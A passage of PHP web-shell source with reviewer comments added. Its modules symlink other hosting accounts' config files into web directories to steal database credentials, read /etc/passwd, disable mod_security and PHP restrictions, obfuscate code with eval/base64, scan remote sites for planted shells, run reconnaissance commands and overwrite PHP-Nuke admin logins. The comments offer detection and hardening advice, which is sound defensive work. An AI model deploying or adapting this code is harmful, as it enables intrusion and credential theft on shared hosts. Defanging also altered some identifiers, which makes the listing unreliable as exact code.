$rs="/homez.33/".$us."/www/".$c; $rs="/homez.34/".$us."/www/".$c; $rs="/homez.35/".$us."/www/".$c; $rs="/homez.36/".$us."/www/".$c; $rs="/homez.37/".$us."/www/".$c; $rs="/homez.38/".$us."/www/".$c; $rs="/homez.39/".$us."/www/".$c; $rs="/homez.40/".$us."/www/".$c; $rs="/homez.41/".$us."/www/".$c; $rs="/homez.42/".$us."/www/".$c; $rs="/homez.43/".$us."/www/".$c; $rs="/homez.44/".$us."/www/".$c; $rs="/homez.45/".$us."/www/".$c; $rs="/homez.46/".$us."/www/".$c; $rs="/homez.47/".$us."/www/".$c; $rs="/homez.48/".$us."/www/".$c; $rs="/homez.49/".$us."/www/".$c; $rs="/homez.50/".$us."/www/".$c; $rs="/homez.51/".$us."/www/".$c; $rs="/homez.52/".$us."/www/".$c; $rs="/homez.53/".$us."/www/".$c; $rs="/homez.54/".$us."/www/".$c; $rs="/homez.55/".$us."/www/".$c; $rs="/homez.56/".$us."/www/".$c; $rs="/homez.57/".$us."/www/".$c; $rs="/homez.58/".$us."/www/".$c; $rs="/homez.59/".$us."/www/".$c; $rs="/homez.60/".$us."/www/".$c; $rs="/homez.61/".$us."/www/".$c; $rs="/homez.62/".$us."/www/".$c; $rs="/homez.63/".$us."/www/".$c; $rs="/homez.64/".$us."/www/".$c; $rs="/homez.65/".$us."/www/".$c; $rs="/homez.66/".$us."/www/".$c; $rs="/homez.67/".$us."/www/".$c; $rs="/homez.68/".$us."/www/".$c; $rs="/homez.69/".$us."/www/".$c; $rs="/homez.70/".$us."/www/".$c; $rs="/homez.71/".$us."/www/".$c; $rs="/homez.72/".$us."/www/".$c; $rs="/homez.73/".$us."/www/".$c; $rs="/homez.74/".$us."/www/".$c; $rs="/homez.75/".$us."/www/".$c; $rs="/homez.76/".$us."/www/".$c; $rs="/homez.77/".$us."/www/".$c; $rs="/homez.78/".$us."/www/".$c; $rs="/homez.79/".$us."/www/".$c; $rs="/homez.80/".$us."/www/".$c; $rs="/homez.81/".$us."/www/".$c; $rs="/homez.82/".$us."/www/".$c; $rs="/homez.83/".$us."/www/".$c; $rs="/homez.84/".$us."/www/".$c; $rs="/homez.85/".$us."/www/".$c; $rs="/homez.86/".$us."/www/".$c; $rs="/homez.87/".$us."/www/".$c; $rs="/homez.88/".$us."/www/".$c; $rs="/homez.89/".$us."/www/".$c; $rs="/homez.100/".$us."/www/".$c; $rs="/homez.101/".$us."/www/".$c; $rs="/homez.102/".$us."/www/".$c; 
$rs="/homez.103/".$us."/www/".$c; $rs="/homez.104/".$us."/www/".$c; $rs="/homez.105/".$us."/www/".$c; $rs="/homez.106/".$us."/www/".$c; $rs="/homez.107/".$us."/www/".$c; $rs="/homez.108/".$us."/www/".$c; $rs="/homez.109/".$us."/www/".$c; $rs="/homez.110/".$us."/www/".$c; $rs="/homez.111/".$us."/www/".$c; $rs="/homez.112/".$us."/www/".$c; $rs="/homez.113/".$us."/www/".$c; $rs="/homez.114/".$us."/www/".$c; $rs="/homez.115/".$us."/www/".$c; $rs="/homez.116/".$us."/www/".$c; $rs="/homez.117/".$us."/www/".$c; $rs="/homez.118/".$us."/www/".$c; $rs="/homez.119/".$us."/www/".$c; $rs="/homez.120/".$us."/www/".$c; $rs="/homez.121/".$us."/www/".$c; $rs="/homez.122/".$us."/www/".$c; $rs="/homez.123/".$us."/www/".$c; $rs="/homez.124/".$us."/www/".$c; $rs="/homez.125/".$us."/www/".$c; $rs="/homez.126/".$us."/www/".$c; $rs="/homez.127/".$us."/www/".$c; $rs="/homez.128/".$us."/www/".$c; $rs="/homez.129/".$us."/www/".$c; $rs="/homez.130/".$us."/www/".$c; $r="OVH/".$us."~".$c; symlink($rs,$r); } } } ?>
7109 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'litespeed')) {
/* Web-shell module selected by ?x=litespeed. Same pattern as the other
   hosting-specific modules of this shell: enumerate local account names, then
   plant symlinks to other accounts' config files under a web-served directory. */ ?>
7110 <form action="?y=<?php echo $pwd; ?>&x=litespeed" method="post">
7111 <?php /* $head: static page header with show/hide JavaScript helpers; echoed unchanged below. */ $head = '
7112<html>
7113<head>
7114</script>
7115<title>LITESPEED - APACHE</title>
7116<meta hxxp-equiv="Content-Type" content="text/html; charset=UTF-8">
7117<script language=\'javascript\'>
7118function hide_div(id)
7119{
7120 document.getElementById(id).style.display = \'none\';
7121 document.cookie=id+\'=0;\';
7122}
7123function show_div(id)
7124{
7125 document.getElementById(id).style.display = \'block\';
7126 document.cookie=id+\'=1;\';
7127}
7128function change_divst(id)
7129{
7130if (document.getElementById(id).style.display == \'none\')
7131show_div(id);
7132else
7133hide_div(id);
7134}
7135</script>'; ?>
7136<html>
7137<head>
7138<?php echo $head; ?>
7139<body bgcolor=black><center><br/><br/> <img src="hxxp://www.ftt.co.uk/images/nginx.png"><br/><img src="hxxp://www.litespeedtech.com/images/litespeed/Subpage_misc/LSWS_logo.png">
7140<form method=post><br/><br/>
7141<nobr><b><span class='b7'>[ LITESPEED - NGINX</span> <span class='b8'>TOOLS ]</span></b></nobr><br/><br/>
7142<p><input type=submit style=color:#FF0000;background-color:#000000 name="usre" value="EXTRACT USER" /></form><br/><br/><br/>
7143
7144<?php /* "EXTRACT USER": reads /etc/passwd and prints the first ':'-separated
   field of every line into the textarea that is posted back as $_POST['user']. */
if(isset($_POST['usre'])){ ?>
7145<form method=post>
7146<textarea rows=20 style=color:#FF0000;background-color:#000000 cols=60 name=user><?php $users=file("/etc/passwd"); foreach($users as $user) { $str=explode(":",$user); echo $str[0]."\n"; } ?></textarea><br><br>
7147<input type=submit style=color:#FF0000;background-color:#000000 name=su value="EXECUTE" /></form><br/>
7148<?php } ?>
7149
7150<?php
/* "EXECUTE": error reporting is switched off, then the code creates
   litespeed/ and LITESPEED/ (mode 0777) relative to the current directory and
   writes the same .htaccess rules into both. The rules enable FollowSymlinks,
   remove the .php handler and type .php as application/octet-stream,
   presumably so that linked PHP files are returned as data instead of being
   executed. It links "/" to litespeed/dm.shtml and then, for every posted
   account name and every name in $configuration, links
   /home/<account>/public_html/<file> to LITESPEED/<account>~<file>.
   No return value is checked.
   Hunting: directories named litespeed or LITESPEED under a document root, an
   .htaccess containing "RemoveHandler .php", and symlinks resolving outside
   the owning account.
   Hardening: SymLinksIfOwnerMatch instead of FollowSymLinks, a restrictive
   AllowOverride, and config files that other accounts cannot read. */
error_reporting(0); if(isset($_POST['su'])){ mkdir('litespeed',0777); $rr = "Options +FollowSymlinks \r
7151Options +IncludesNoExec -ExecCGI \r
7152DirectoryIndex index.html index.shtml index.htm index.php \r
7153RemoveHandler .php \r
7154AddType text/html .shtml \r
7155AddType application/octet-stream .php \r
7156AddHandler server-parsed .shtml"; $g = fopen('litespeed/.htaccess','w'); fwrite($g,$rr); $dm = symlink("/","litespeed/dm.shtml"); $rt="<a href=litespeed/dm.shtml><b><span class='b11'>[ SYMLINK ]</span></b></a>"; echo "<nobr>[~] "; echo "$rt"; $dir=mkdir('LITESPEED',0777); $r = "Options +FollowSymlinks \r
7157Options +IncludesNoExec -ExecCGI \r
7158DirectoryIndex index.html index.shtml index.htm index.php \r
7159RemoveHandler .php \r
7160AddType text/html .shtml \r
7161AddType application/octet-stream .php \r
7162 AddHandler server-parsed .shtml"; $f = fopen('LITESPEED/.htaccess','w'); fwrite($f,$r); $consym="<a href=LITESPEED/><b><span class='b11'>[ CONFIG KILLER ]</span></b> </a>"; echo " [~] "; echo "$consym"; echo " [~]</nobr>"; $usr=explode("\n",$_POST['user']); $configuration=array( "aksi.php", "aksi.php.old", "aksi.php.bak", "conf.php", "conf.php.old", "conf.php.bak", "conf_global.php", "conf_global.php.old", "conf_global.php.bak", "config.php", "config.php.old", "config.php.bak", "configuration.php", "configuration.php.old", "configuration.php.bak", "conn.php", "conn.php.old", "conn.php.bak", "connect.php", "connect.php.old", "connect.php.bak", "connection.php", "connection.php.old", "connection.php.bak", "db.php", "db.php.old", "db.php.bak", "database.php", "database.php.old", "database.php.bak", "inc.php", "inc.php.old", "inc.php.bak", "koneksi.php", "koneksi.php.old", "koneksi.php.bak", "mysql.php", "myqsl.php.old", "mysql.php.bak", "setting.php", "setting.php.old", "setting.php.bak", "Settings.php", "Settings.php.old", "Settings.php.bak", "sql.php", "sql.php.old", "sql.php.bak"); foreach($usr as $uss ){ $us=trim($uss); foreach($configuration as $c){ $rs="/home/".$us."/public_html/".$c; $r="LITESPEED/".$us."~".$c; symlink($rs,$r); } } } ?>
7163 <?php } else if(isset($_GET['gdork'])) {
/* Module selected by ?gdork. When any of the GET fields title/text/url/site is
   present, each non-empty value is wrapped in the matching search operator
   (intitle, intext, inurl, site) and the concatenation is pre-filled into a
   form that submits to a search engine. Nothing is fetched server-side here;
   the values are echoed into the page without HTML escaping. */
if( isset($_GET['title']) || isset($_GET['text']) || isset($_GET['url']) || isset($_GET['site']) ) { $title = $_GET['title']; $text = $_GET['text']; $url = $_GET['url']; $site = $_GET['site']; if($title != "") { $title = " intitle:\"".$title."\" "; } if($text != "") { $text = " intext:\"".$text."\" "; } if($url != "") { $url = " inurl:\"".$url."\" "; } if($site != "") { $site = " site:\"".$site."\" "; } ?>
7164 <div align="center">
7165 <form action="hxxp://google.com" method="GET">
7166 <input style="color:#000000" class="cmd" style="border: solid red 1px;" name="q" value='<?php echo $title.$text.$url.$site ?>' /><br />
7167 <input style="color:#000000" type="submit" style="Padding:5px;" class="own" value='Google It! ;)' />
7168 </form>
7169 </div>
7170 <?php } else {
/* No search field supplied yet: render the input form. The pre-filled defaults
   below are presumably strings the operator uses to find already-planted
   uploaders, which makes them candidate hunting strings for defenders
   checking their own sites. */ ?>
7171 <p align="center" style="color:red;">Note : Any one of the following options is compulsory to be filled rest can be left blank.</p>
7172 <center><table id="margins" >
7173 <tr>
7174 <form method='GET'>
7175 <input style="color:#000000" type="hidden" name="gdork" />
7176 <tr>
7177 <td width="100" class="title">
7178 intitle
7179 </td>
7180 <td>
7181 <input style="color:#000000" class="cmd" name="title" value="uploader by ghozt dz"/>
7182 </td>
7183 </tr>
7184 <tr>
7185 <td class="title">
7186 intext
7187 </td>
7188 <td>
7189 <input style="color:#000000" class="cmd" name="text" value="Linux" />
7190 </td>
7191 </tr>
7192 <tr>
7193 <td width="100" class="title">
7194 inurl
7195 </td>
7196 <td>
7197 <input style="color:#000000" class="cmd" name="url" value="images/stories/3xp.php"/>
7198 </td>
7199 </tr>
7200 <tr>
7201 <td width="100" class="title">
7202 site
7203 </td>
7204 <td>
7205 <input style="color:#000000" class="cmd" name="site" value="*.com"/>
7206 </td>
7207 </tr>
7208 <tr>
7209 <td rowspan="2" >
7210 <input style="color:#000000" style="margin : 20px; margin-left: 390px; padding : 10px;" type="submit" class="own" value="Croot the Dork!"/>
7211 </td>
7212 </tr>
7213 </form>
7214 </table></center>
7215 <?php } } else if(isset($_GET['obfuscate'])) {
/* Module selected by ?obfuscate. Posted code is passed through stripslashes,
   trim, gzdeflate (level 9) and base64_encode, and the result is wrapped in a
   PHP stub that reverses it with eval(gzinflate(base64_decode(...))). The stub
   is only displayed in the textarea below; this branch does not write it to
   disk.
   Detection: the eval/gzinflate/base64_decode chain and the fixed trailer
   comment in the stub are stable strings to search for in PHP files under a
   document root. Files matching them need manual decoding before any
   conclusion about what they do. */
if ( isset($_POST['code']) && $_POST['code'] != '') { $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); $encode = '
7216<?php
7217$encoded = \''.$encoded.'\';
7218eval(gzinflate(base64_decode($encoded)));
7219// Script Encoded by ROOTACTIVE
7220?>
7221'; } else { $encode = 'Please Enter your Code! and Click Submit! :)'; }?>
7222 <center><form method="POST">
7223 <textarea style="color:#000000" class="cmd" cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
7224 <input style="color:#000000;margin: 20px; margin-left: 50px; padding: 10px;" class="own" type="submit" value="Encode :D"/>
7225 </form></center>
7226
7227 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'ppcheck')) {
/* The four modules ppcheck, schoolhos, music and dork contain no server-side
   logic. Each renders a form tag and an iframe whose src points at a
   third-party host, so the content is fetched by the operator's browser, not
   by the compromised server. The iframe hosts are network indicators; the
   listing shows them defanged (hxxp). What those remote pages serve cannot be
   determined from this file. */ ?>
7228 <form action="?y=<?php echo $pwd; ?>&x=ppcheck" method="post">
7229 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/pp.php" width="100%"></iframe>
7230 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'schoolhos')) { /* remote iframe only, see the note on the ppcheck module */ ?>
7231 <form action="?y=<?php echo $pwd; ?>&x=schoolhos" method="post">
7232 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/shost.php" width="100%"></iframe>
7233 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'music')) { /* remote iframe only */ ?>
7234 <form action="?y=<?php echo $pwd; ?>&x=music" method="post">
7235 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://divine-music.info/musicfiles/" width="100%"></iframe>
7236 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'dork')) { /* remote iframe only */ ?>
7237 <form action="?y=<?php echo $pwd; ?>&x=dork" method="post">
7238 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://rubiq.co.za/administrator/dork.txt" width="100%"></iframe>
7239 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shellscan')) {
/* Module selected by ?x=shellscan: probes a remote site for files with
   well-known web-shell names. The textarea below carries the default filename
   list, which doubles as a filename hunt list for a defender's own document
   roots. */ ?>
7240 <form action="?y=<?php echo $pwd; ?>&x=shellscan" method="post">
7241 <center><br /><br />
7242<table><form method='POST'>
7243<tr><td>URL TARGET : <input size=40 style='color:#FF0000;background-color:#000000' name='rem_web' value='hxxp://'></td></tr>
7244<tr><td><font color=red>INPUT NAMA FILE / SHELL</font></tr></td>
7245<tr><td><textarea spellcheck='false' class='textarea_edit' style='color:#FF0000;background-color:#000000' cols=50 rows=30 name='tryzzz'>
7246b374k-2.7.php
7247WSO-2.7.php
7248WSO.php
7249dz.php
7250cpanelcracker.php
7251blackshadow.php
7252sym.php
7253ftpcracker.php
7254cpanel.php
7255cpn.php
7256sql.php
7257mysql.php
7258madspot.php
7259itsecteam_shell.php
7260b374k.php
7261madsopot.php
7262indishell.php
7263Cgishell.pl
7264killer.php
7265changeall.php
72662.php
7267Sh3ll.php
7268dz0.php
7269dam.php
7270user.php
7271dom.php
7272whmcs.php
7273r00t.php
7274c99.php
7275gaza.php
7276q.php
72771.php
7278d0mains.php
7279madspotshell.php
7280Sym.php
7281c22.php
7282c100.php
7283Cpanel.php
7284zone-h.php
7285cp.php
7286L3b.php
7287d.php
7288admin1.php
7289upload.php
7290up.php
7291uploads.php
7292sa.php
7293r57.php
7294shell.php
7295sa.php
7296</textarea></td></tr>
7297<tr><td><br /><input type='submit' style='color:#FF0000;background-color:#000000' value=' >> SCAN >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />
7298
7299<?php
/* Runs on every request to this branch (there is no isset() guard on the POST
   fields). Each line of $_POST['tryzzz'] is appended to $_POST['rem_web']; when
   cURL is available a body-less request (CURLOPT_NOBODY) is sent and a status
   code equal to 200 is reported as "Found". The time limit is lifted with
   set_time_limit(0).
   Detection on the probed site: a run of HEAD requests for these filenames
   from a single client, mostly answered 404. On the compromised host:
   outbound HTTP requests originating from the PHP worker.
   NOTE(review): the paste's hxxp defanging has also rewritten identifiers
   (the CURLINFO_ constant below), so this listing is not byte-identical to
   the original sample; do not derive hashes or exact-match signatures from it. */
set_time_limit(0); $rtr=array(); echo "<div id=result><center><table>"; $webz=$_POST['rem_web']; $uri_in=$_POST['tryzzz']; $r_xuri = trim($uri_in); $r_xuri=explode("\n", $r_xuri); foreach($r_xuri as $rty) { $urlzzx=$webz.$rty; if(function_exists('curl_init')) { echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> $urlzzx </font></td>"; $ch = curl_init($urlzzx); curl_setopt($ch, CURLOPT_NOBODY, true); curl_exec($ch); $status_code=curl_getinfo($ch, CURLINFO_hxxp_CODE); curl_close($ch); if($status_code==200) { echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>"; } else { echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>"; } } else { echo "<font color=red>cURL Not Found </font>"; } } echo "</table><br /><br /><hr /><br /><br /></div>"; ?>
7300 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'security')) {
/* Module selected by ?x=security: drops per-directory configuration files
   intended to switch off server-side protections. */ ?>
7301 <form action="?y=<?php echo $pwd; ?>&x=security" method="post">
7302 <?php /* Two forms, each with a PATH field pre-filled from $pwd (set elsewhere in the file). */ echo "<html>
7303<center><br><br><font color=#FF0000 >[+] GENERATED php.ini [+]</font><br>
7304<form method='POST' >
7305<font color=#FF0000 > PATH : </font><input type='text' name='phpinisafemode' value='$pwd' style='color:#FF0000;background-color:#000000' />
7306<input type='submit' name='dsmsubmit' style='color:#FF0000;background-color:#000000' value=' >> ' />
7307</form>
7308<br><br>
7309<font color=#FF0000 >[+] GENERATED Htaccess [+}</font><br>
7310<form method='POST' >
7311<font color=#FF0000 > PATH : </font><input type='text' name='htaccesssafemode' style='color:#FF0000;background-color:#000000' value='$pwd' />
7312<input type='submit' name='omssubmit' style='color:#FF0000;background-color:#000000' value=' >> ' />
7313</form>";
/* omssubmit: writes an .htaccess whose body is an <IfModule mod_security.c>
   block; the path is the posted phpinisafemode value followed by ".htaccess".
   dsmsubmit: writes a file named php.ini; the path is the posted
   htaccesssafemode value followed by "php.ini". Its body sets
   disable_functions = NONE and open_basedir = OFF, among others.
   Neither fopen() result is checked.
   NOTE(review): the directive names inside the IfModule block appear masked
   ("Sec------") in this listing, presumably by the paste site's filter.
   Hunting: unexpected .htaccess files containing an IfModule mod_security.c
   block, and stray php.ini files in web directories with the settings above.
   Hardening: do not let per-directory .htaccess or php.ini files override
   these settings (restrictive AllowOverride; per-directory ini files disabled
   or ignored by the PHP handler). */
$dirphpini = $_POST['phpinisafemode']; $dirhtaccess = $_POST['htaccesssafemode']; $phpininamelol = "php.ini"; if($_POST['omssubmit']) { $fse=fopen("$dirphpini.htaccess","w"); fwrite($fse,'<IfModule mod_security.c>
7314Sec------Engine Off
7315Sec------ScanPOST Off
7316</IfModule>'); fclose($fse); } else if ($_POST['dsmsubmit']) { $fse=fopen("$dirhtaccess$phpininamelol","w"); fwrite($fse,'safe_mode = OFF
7317disable_functions = NONE
7318safe_mode_gid = OFF
7319open_basedir = OFF
7320register_globals = ON
7321exec = ON
7322shell_exec = ON'); fclose($fse); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'systemview')) { ?>
7323 <form action="?y=<?php echo $pwd; ?>&x=systemview" method="post">
7324 <?php
/* processc99(): runs a process-listing command through myshellexec() (defined
   elsewhere in the file) and prints the result as an HTML table. The command
   is "ps -aux" (optionally piped through grep) when $win is falsy and
   "tasklist" otherwise; the output is passed through htmlspecialchars() before
   parsing. When $pid is set it also calls posix_kill() with $sig (9 if null).
   The function takes no parameters and no global statement is visible in its
   body, so $win, $grep, $pid, $sig, $processes_sort, $sort_default and $y are
   function-local as written here.
   NOTE(review): the name suggests this was lifted from the c99 shell; not
   verified. ereg() and convert_cyr_string() have been removed from current PHP
   releases, which dates the code. */
function processc99() { if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode("\n",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); $prcs = array(); foreach ($stack as $line) { if (!empty($line)) { echo "<tr>"; $line = explode(" ",$line); $line[10] = join(" ",array_slice($line,10)); $line = array_slice($line,0,11); $prcs[] = $line; echo "</tr>"; } } } else { while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} while (ereg("",$ret)) {$ret = str_replace("","",$ret);} while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} $ret = convert_cyr_string($ret,"d","w"); $stack = explode("\n",$ret); unset($stack[0],$stack[2]); $stack = array_values($stack); $head = explode("",$stack[0]); $head[1] = explode(" ",$head[1]); $head[1] = $head[1][0]; $stack = array_slice($stack,1); unset($head[2]); $head = array_values($head); if ($k > count($head)) {$k = count($head)-1;} $prcs = array(); foreach ($stack as 
$line) { if (!empty($line)) { echo "<tr>"; $line = explode("",$line); $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); $line[2] = intval(str_replace(" ","",$line[2]))*1024; $prcs[] = $line; echo "</tr>"; } } } $head[$k] = "<b>".$head[$k]."</b>".$y; $v = $processes_sort[0]; if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} $tab = array(); $tab[] = $head; $tab = array_merge($tab,$prcs); echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>"; foreach($tab as $i=>$k) { echo "<tr>"; foreach($k as $j=>$v) { if ($win and $i > 0 and $j == 2) { $v = view_size($v); } echo "<td>".$v."</td>";} echo "</tr>"; } echo "</table>"; } }
/* Module body for ?x=systemview: prints one of two drop-down forms depending
   on $win (set elsewhere in the file). */
echo "<center><br><br>"; if($win) { echo "<form method='post'>
7325 <select class='inputz' name='windowsprocess'>
7326 <option name='systeminfo'>System Info</option>
7327 <option name='active'>Active Connections</option>
7328 <option name='runningserv'>Running Services</option>
7329 <option name='useracc'>User Accounts</option>
7330 <option name='showcom'>Show Computers</option>
7331 <option name='arptab'>ARP Table</option>
7332 <option name='ipconf'>IP Configuration</option>
7333 </select>
7334 <input type='submit' class='inputzbut' name='submitwinprocess' value='View'>
7335 </form>
7336 "; } else { echo "<form method='post'>
7337 <select class='inputz' name='nonwindowsprocess'>
7338 <option name='processsta'>Process status</option>
7339 <option name='syslog'>Syslog</option>
7340 <option name='resolv'>Resolv</option>
7341 <option name='hosts'>Hosts</option>
7342 <option name='passwd'>Passwd</option>
7343 <option name='cpuinfo'>Cpuinfo</option>
7344 <option name='version'>Version</option>
7345 <option name='sbin'>Sbin</option>
7346 <option name='interrupts'>Interrupts</option>
7347 <option name='lsattr'>lsattr</option>
7348 <option name='uptime'>Uptime</option>
7349 <option name='fstab'>Fstab</option>
7350 <option name='hddspace'>HDD Space</option>
7351 </select>
7352 <input type='submit' class='inputzbut' name='submitnonwinprocess' value=' >> '>
7353 </form>
7354 "; }
/* The posted option label is compared against fixed strings and mapped to a
   fixed command line; the posted value itself never reaches the command. The
   command is run through exe() (defined elsewhere in the file) and its output
   is echoed into a textarea. "Process status" sets $systeminfo instead, which
   triggers processc99().
   Detection: the web server or PHP worker account spawning systeminfo,
   netstat, net, arp, ipconfig, ps, cat, ls, lsattr, uptime or df is a strong
   host-telemetry signal, because web applications rarely start these.
   Hardening: disable PHP's process-execution functions where the application
   does not need them. */
$windowsprocess = $_POST['windowsprocess']; $nonwindowsprocess = $_POST['nonwindowsprocess']; if ($windowsprocess=="System Info") $winruncom = "systeminfo"; if ($windowsprocess=="Active Connections") $winruncom = "netstat -an"; if ($windowsprocess=="Running Services") $winruncom = "net start"; if ($windowsprocess=="User Accounts") $winruncom = "net user"; if ($windowsprocess=="Show Computers") $winruncom = "net view"; if ($windowsprocess=="ARP Table") $winruncom = "arp -a"; if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all"; if ($nonwindowsprocess=="Process status") $systeminfo = "ps aux"; if ($nonwindowsprocess=="Syslog") $winruncom = "cat /etc/syslog.conf"; if ($nonwindowsprocess=="Resolv") $winruncom = "cat /etc/resolv.conf"; if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts"; if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd"; if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo"; if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version"; if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin"; if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts"; if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va"; if ($nonwindowsprocess=="Uptime") $winruncom = "uptime"; if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab"; if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h"; if (isset($winruncom)) { echo "<table class='cmdbox'>
7355 <tbody><tr>
7356 <td colspan='2'>
7357 <textarea class='output' name='content'>".exe($winruncom)."</textarea>
7358 </td></tr></table></center>"; } if (isset($systeminfo)) { echo "<br><br>"; processc99(); } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hack-db')) { ?>
7359 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'forbidden')) {
/* Module selected by ?x=forbidden (the preceding hack-db branch is empty). */ ?>
7360 <form action="?y=<?php echo $pwd; ?>&x=forbidden" method="post">
7361 <?php
/* On "Generate": changes into the posted path, creates and enters a
   subdirectory named forbidden, and writes an .htaccess there. Depending on
   the selected option, the file makes the server present a file called in.txt
   as the directory index, header, readme or footer, or types .php as text.
   The message printed afterwards asks the operator to create in.txt as a
   symlink by hand; this code does not create it. chdir/mkdir errors are
   suppressed with @ and the fopen() result is not checked.
   Hunting: a directory named forbidden whose .htaccess references in.txt,
   especially where in.txt is a symlink resolving outside the account.
   Hardening: SymLinksIfOwnerMatch instead of FollowSymLinks, and a restrictive
   AllowOverride so uploaded .htaccess files cannot change indexing or handlers. */
if($_POST['generateForbidden']) { @chdir($_POST['forbiddenPath']); @mkdir('forbidden'); @chdir('forbidden'); $htaccess = fopen('.htaccess','w+'); if($_POST['403'] == 'DirectoryIndex') { fwrite($htaccess,"DirectoryIndex in.txt"); } elseif($_POST['403'] == 'HeaderName') { fwrite($htaccess,"HeaderName in.txt"); } elseif($_POST['403'] == 'TXT') { fwrite($htaccess,"
7362 Options Indexes FollowSymLinks
7363 addType txt .php
7364 AddHandler txt .php"); } elseif($_POST['403'] == '404') { fwrite($htaccess,"
7365 ErrorDocument 404 /404.html
7366 404.html = Symlinked in.txt "); } elseif($_POST['403'] == 'ReadmeName') { fwrite($htaccess,"ReadmeName in.txt"); } elseif($_POST['403'] == 'footerName') { fwrite($htaccess,"footerName in.txt"); } echo "
7367Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
7368EX : ln -s /home/user/public_html/config.php in.txt"; } echo "<br><br><center><form method=POST><input type='text' style='color:#FF0000;background-color:#000000' value='".getcwd()."' name='forbiddenPath' size='30%'/><select style='color:#FF0000;background-color:#000000' name='403'><option value='DirectoryIndex'>DirectoryIndex</option><option value='HeaderName'>HeaderName</option><option value='TXT'>TXT</option><option value='404'>404</option><option value='ReadmeName'>ReadmeName</option><option value='footerName'>footerName</option> </select>
7369<input type='submit' style='color:#FF0000;background-color:#000000' value='Generate' name='generateForbidden'></form></center>"; ?>
7370 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mailbomb')) {
/* Module selected by ?x=mailbomb: no server-side logic in this file. It only
   embeds a page from a third-party host in an iframe, so the content is
   fetched by the operator's browser. The iframe host is a network indicator
   (shown defanged as hxxp); what the remote page does cannot be determined
   from this listing. */ ?>
7371 <form action="?y=<?php echo $pwd; ?>&x=mailbomb" method="post">
7372 <iframe align="center" frameborder="10" height="400" scrolling="auto" src="hxxp://iearn-india.org/upload/ar.php" width="100%"></iframe>
7373 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'phpnuke')) {
/* Module selected by ?x=phpnuke: overwrites administrator credentials in a
   PHP-Nuke database using database credentials the operator supplies. */ ?>
7374 <form action="?y=<?php echo $pwd; ?>&x=phpnuke" method="post">
7375 <?php /* Form collecting DB host/name/user/password, a table prefix and the replacement login. */ echo "<html><head><title>PHPNukeLoginChanger</title></head>"; echo "<body><center>
7376<h2>^_^ Cyber Roulette ^_^</h2>
7377<h3>PHPNuke UsEr-PaSs FuCk3r</h3>
7378<form method=POST action=''>
7379DB HOST<br/>
7380<input style='color:lime;background-color:#000000' value=localhost type=text name=anu1 size='40'><br/>
7381DB NAME<br/>
7382<input style='color:lime;background-color:#000000' type=text name=anu2 size='40'><br/>
7383DB USER<br/>
7384<input style='color:lime;background-color:#000000' type=text name=anu3 size='40'><br/>
7385DB PASSWORD<br/>
7386<input style='color:lime;background-color:#000000' type=password name=anu4 size='40'><br/>
7387<hr style='color:lime;'>
7388
7389TARGET PREFIX<br/>
7390<input style='color:lime;background-color:#000000' type=txt name=prefix size='20'><br/>
7391NEW ADMIN LOGIN USER<br/>
